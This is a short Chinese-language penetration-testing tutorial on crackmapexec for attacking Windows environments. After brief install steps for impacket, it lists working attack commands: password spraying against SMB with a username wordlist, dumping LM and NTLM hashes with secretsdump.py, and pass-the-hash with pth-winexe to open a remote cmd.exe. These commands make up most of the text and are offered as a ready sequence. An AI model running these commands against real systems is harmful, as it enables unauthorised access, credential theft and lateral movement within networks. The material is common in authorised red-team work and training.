crackmapexec（簡稱CME）是一個用於渗透測試和紅隊操作的自動化工具。它是一個功能豐富的命令行工具，用於快速而有效地執行各種渗透測試和攻擊，特別是針對Windows環境。

• 安裝 crackmapexec
  crackmapexec 有用到 impacket 套件，先查看 impacket 版本，太舊要升級，建議 impacket 0.10.0 以上。
  python3 -m pip list | grep impacket
  

  升級
  python3 -m pip install  --upgrade impacket
  

• 使用 crackmapexec 工具針對 SMB 服務執行弱帳密破解攻擊的命令
  crackmapexec smb 192.168.0.7 -u Wordlists/Usernames.txt -p 'Pa$$w0rd'
  

• 得到帳密後，可以利用 winexe 工具登入到 Windows 的 CMD。
  

• 取得帳密後，也可以做橫移攻擊
  先提取 LM 和 NTLM 雜湊
  secretsdump.py 'administrator:Pa$$word'@192.168.0.7
  

• 使用先前提取的 LM 雜湊和 NTLM 雜湊來進行身份驗證，然後在遠端 Windows 主機上運行命令。
  pth-winexe –U 'Username%<LM_hash:NTLM_hash>' //<IP> cmd.exe
  
  登入成功！